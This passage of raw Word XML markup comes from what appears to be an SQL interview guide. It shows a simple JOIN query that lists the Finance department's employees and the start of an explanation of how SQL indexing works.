      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>youngest</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0BA9B7" w14:textId="3201B437"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2936AFC4">
          <v:rect id="_x0000_i3017" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="05821AAC" w14:textId="4ADB305B" w:rsidR="00205C15" w:rsidRPr="00CE4B95" w:rsidRDefault="00904FB6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="733" w:name="_Toc196308213"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r w:rsidR="00EB14F8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">uery </w:t>
      </w:r>
      <w:r w:rsidR="00EB14F8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>- G</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>et list of employees from Finance department</w:t>
      </w:r>
      <w:r w:rsidR="00205C15" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="733"/>
    </w:p>
    <w:p w14:paraId="17261538" w14:textId="6FC4C68F" w:rsidR="003F3D59" w:rsidRPr="005C1C9E" w:rsidRDefault="003F3D59" w:rsidP="005C1C9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Here’s the SQL query to get the list of employees from the </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Finance</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> department, assuming you have the following two tables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B08C9C1" w14:textId="77777777" w:rsidR="003F3D59" w:rsidRPr="005C1C9E" w:rsidRDefault="003F3D59" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Employee(employee_id, employee_name, department_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B30C4BD" w14:textId="77777777" w:rsidR="003F3D59" w:rsidRPr="005C1C9E" w:rsidRDefault="003F3D59" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Department(department_id, department_name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F82F0B" w14:textId="77777777" w:rsidR="003F3D59" w:rsidRPr="005C1C9E" w:rsidRDefault="003F3D59" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL Query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1431B588" w14:textId="77777777" w:rsidR="003F3D59" w:rsidRPr="005C1C9E" w:rsidRDefault="003F3D59" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SELECT e.employee_id, e.employee_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520DD189" w14:textId="77777777" w:rsidR="003F3D59" w:rsidRPr="005C1C9E" w:rsidRDefault="003F3D59" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>FROM employee e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772C5845" w14:textId="77777777" w:rsidR="003F3D59" w:rsidRPr="005C1C9E" w:rsidRDefault="003F3D59" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JOIN department d ON e.department_id = d.department_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4357A8" w14:textId="77777777" w:rsidR="003F3D59" w:rsidRPr="005C1C9E" w:rsidRDefault="003F3D59" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WHERE d.department_name = 'Finance';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F257B42" w14:textId="48E06CA3"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7D7D3ED5">
          <v:rect id="_x0000_i3018" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D95478F" w14:textId="0C828721" w:rsidR="00205C15" w:rsidRPr="00CE4B95" w:rsidRDefault="00380657">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="734" w:name="_Toc196308214"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Indexing in SQL</w:t>
      </w:r>
      <w:r w:rsidR="00205C15" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="734"/>
    </w:p>
    <w:p w14:paraId="36850D35" w14:textId="142532B1" w:rsidR="00AA35F5" w:rsidRPr="005C1C9E" w:rsidRDefault="00AA35F5" w:rsidP="005C1C9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Indexing in SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a technique used to improve the </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>performance and speed</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of data retrieval operations on a database table. An index in a database is similar to an index in a book — it allows the database engine to find data </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>faster</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> without scanning the entire table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29586E71" w14:textId="77777777" w:rsidR="00AA35F5" w:rsidRPr="005C1C9E" w:rsidRDefault="00000000" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="18521723">
          <v:rect id="_x0000_i3019" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4091A3C4" w14:textId="77777777" w:rsidR="00AA35F5" w:rsidRPr="005C1C9E" w:rsidRDefault="00AA35F5" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔍</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> What is an Index?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E447151" w14:textId="77777777" w:rsidR="00AA35F5" w:rsidRPr="005C1C9E" w:rsidRDefault="00AA35F5"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An </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>index</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>database object</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> created on one or more columns of a table. It creates a </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lookup table</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that the database can use to quickly locate rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BC0579" w14:textId="77777777" w:rsidR="00AA35F5" w:rsidRPr="005C1C9E" w:rsidRDefault="00000000" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="204E69F7">
          <v:rect id="_x0000_i3020" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="522AACA7" w14:textId="77777777" w:rsidR="00AA35F5" w:rsidRPr="005C1C9E" w:rsidRDefault="00AA35F5" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>⚙️</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> How Index Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2E5743" w14:textId="77777777" w:rsidR="00AA35F5" w:rsidRPr="005C1C9E" w:rsidRDefault="00AA35F5"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Indexes are typically implemented using </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>B-trees</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hash maps</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED681F3" w14:textId="77777777" w:rsidR="00AA35F5" w:rsidRPr="005C1C9E" w:rsidRDefault="00AA35F5" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>When a query searches on indexed columns, the DB engine uses the index to go directly to the matching row, instead of scanning all rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36443499" w14:textId="77777777" w:rsidR="00AA35F5" w:rsidRPr="005C1C9E" w:rsidRDefault="00000000" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="7B43F0CF">
          <v:rect id="_x0000_i3021" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A2AC05" w14:textId="77777777" w:rsidR="00AA35F5" w:rsidRPr="005C1C9E" w:rsidRDefault="00AA35F5" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>📈</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Advantages of Indexing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AE1EE0" w14:textId="77777777" w:rsidR="00AA35F5" w:rsidRPr="005C1C9E" w:rsidRDefault="00AA35F5" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Fast retrieval of data using SELECT queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE32FF3" w14:textId="77777777" w:rsidR="00AA35F5" w:rsidRPr="005C1C9E" w:rsidRDefault="00AA35F5"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Improved </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> clause performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B33613" w14:textId="77777777" w:rsidR="00AA35F5" w:rsidRPr="005C1C9E" w:rsidRDefault="00AA35F5" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
